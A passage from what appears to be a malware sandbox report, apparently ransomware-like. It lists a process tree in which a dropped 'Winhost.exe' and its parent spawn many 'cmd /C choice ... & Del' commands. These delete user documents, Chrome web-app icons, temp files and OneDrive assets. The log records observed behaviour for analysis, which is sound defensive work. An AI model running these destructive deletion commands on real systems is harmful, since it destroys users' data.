      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png"
      4⤵
      PID:8492
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13920
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png"
      4⤵
      PID:8504
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16024
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png"
      4⤵
      PID:8516
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16516
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png"
      4⤵
      PID:8532
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14676
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\256.png"
      4⤵
      PID:8548
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15452
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png"
      4⤵
      PID:8560
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16272
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\48.png"
      4⤵
      PID:8572
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15516
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\64.png"
      4⤵
      PID:8588
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15336
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\96.png"
      4⤵
      PID:8600
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14788
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\128.png"
      4⤵
      PID:8612
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14880
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\192.png"
      4⤵
      PID:8624
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14748
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\256.png"
      4⤵
      PID:8636
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16072
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\32.png"
      4⤵
      PID:8648
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16400
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\48.png"
      4⤵
      PID:8660
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4612
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\64.png"
      4⤵
      PID:8672
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14384
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\96.png"
      4⤵
      PID:8688
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15616
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\128.png"
      4⤵
      PID:8700
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14724
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\192.png"
      4⤵
      PID:8712
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14376
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\256.png"
      4⤵
      PID:8724
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1032
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\32.png"
      4⤵
      PID:8736
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16032
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\48.png"
      4⤵
      PID:8748
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15092
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\64.png"
      4⤵
      PID:8760
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14832
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\96.png"
      4⤵
      PID:8772
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16508
  - - C:\Users\Admin\AppData\Local\Temp\Winhost.exe
      "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:8756
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Desktop.lnk"
        5⤵
        
        PID:17272
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:17632
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Downloads.lnk"
        5⤵
        
        PID:17288
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:17568
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\EnableEnter.txt"
        5⤵
        
        PID:17304
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:17716
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\HideGroup.docx"
        5⤵
        
        PID:17320
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\OpenAssert.xlsx"
        5⤵
        
        PID:17336
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1714135623.txt"
        5⤵
        
        PID:17352
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt"
        5⤵
        
        PID:17368
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI4767.txt"
        5⤵
        
        PID:17384
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI4785.txt"
        5⤵
        
        PID:17400
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:17844
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI4767.txt"
        5⤵
        
        PID:1172
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI4785.txt"
        5⤵
        
        PID:4608
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:18096
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\jawshtml.html"
        5⤵
        
        PID:16944
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        5⤵
        
        PID:548
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20240426_124244853.html"
        5⤵
        
        PID:17256
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:17680
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\tmp11subu.tmp.jpg"
        5⤵
        
        PID:17420
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt"
        5⤵
        
        PID:17436
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:17804
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.VisualElementsManifest.xml"
        5⤵
        
        PID:17452
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt"
        5⤵
        
        PID:17468
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt"
        5⤵
        
        PID:17484
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml"
        5⤵
        
        PID:17500
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml"
        5⤵
        
        PID:17516
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\msoia.exe_Rules.xml"
        5⤵
        
        PID:17532
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\office2016setup.exe_Rules.xml"
        5⤵
        
        PID:17548
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml"
        5⤵
        
        PID:17564
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml"
        5⤵
        
        PID:17580
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml"
        5⤵
        
        PID:17612
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\alertIcon.png"
        5⤵
        
        PID:17628
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppBlue.png"
        5⤵
        
        PID:17644
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorBlue.png"
        5⤵
        
        PID:17660
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorWhite.png"
        5⤵
        
        PID:17676
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppWhite.png"
        5⤵
        
        PID:17692
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.png"
        5⤵
        
        PID:17740
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppBlue.png"
        5⤵
        
        PID:17756
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppWhite.png"
        5⤵
        
        PID:17772
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Error.png"
        5⤵
        
        PID:17788
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ErrorPage.html"
        5⤵
        
        PID:17804
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMHeroToast.png"
        5⤵
        
        PID:17820
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMLockedFileToast.png"
        5⤵
        
        PID:17844
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMScanExclusionToast.png"
        5⤵
        
        PID:17860
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:18056
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LoadingPage.html"
        5⤵
        
        PID:17876
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDriveLogo.png"
        5⤵
        
        PID:17892
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaCritical.png"
        5⤵
        
        PID:17908
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaError.png"
        5⤵
        
        PID:17924
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaNearing.png"
        5⤵
        
        PID:17940
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\TestSharePage.html"
        5⤵
        
        PID:17956
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"
        5⤵
        
        PID:17972
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Warning.png"
        5⤵
        
        PID:17988
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-100.png"
        5⤵
        
        PID:18004
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-125.png"
        5⤵
        
        PID:18020
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:17908
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-150.png"
        5⤵
        
        PID:18036
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-200.png"
        5⤵
        
        PID:18052
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-400.png"
        5⤵
        
        PID:18068
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-100.png"
        5⤵
        
        PID:18084
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-125.png"
        5⤵
        
        PID:18096
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-150.png"
        5⤵
        
        PID:18108
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:17904
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-200.png"
        5⤵
        
        PID:18128
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-400.png"
        5⤵
        
        PID:18140
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-100.png"
        5⤵
        
        PID:18152
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-125.png"
        5⤵
        
        PID:18164
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-150.png"
        5⤵
        
        PID:18176
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-200.png"
        5⤵
        
        PID:18188
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:18660
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-400.png"
        5⤵
        
        PID:18208
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png"
        5⤵
        
        PID:18232
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png"
        5⤵
        
        PID:18244
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-150.png"
        5⤵
        
        PID:18256
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:17460
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-200.png"
        5⤵
        
        PID:18268
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-400.png"
        5⤵
        
        PID:18280
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-100.png"
        5⤵
        
        PID:18292
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-125.png"
        5⤵
        
        PID:18304
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:18068
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-150.png"
        5⤵
        
        PID:18316
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-200.png"
        5⤵
        
        PID:18328
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-400.png"
        5⤵
        
        PID:18340
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-100.png"
        5⤵
        
        PID:18352
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-125.png"
        5⤵
        
        PID:18364
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:18712
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-150.png"
        5⤵
        
        PID:18376
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:18700
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-200.png"
        5⤵
        
        PID:18388
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-400.png"
        5⤵
        
        PID:18400
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:18756
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml"
        5⤵
        
        PID:18412
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:18088
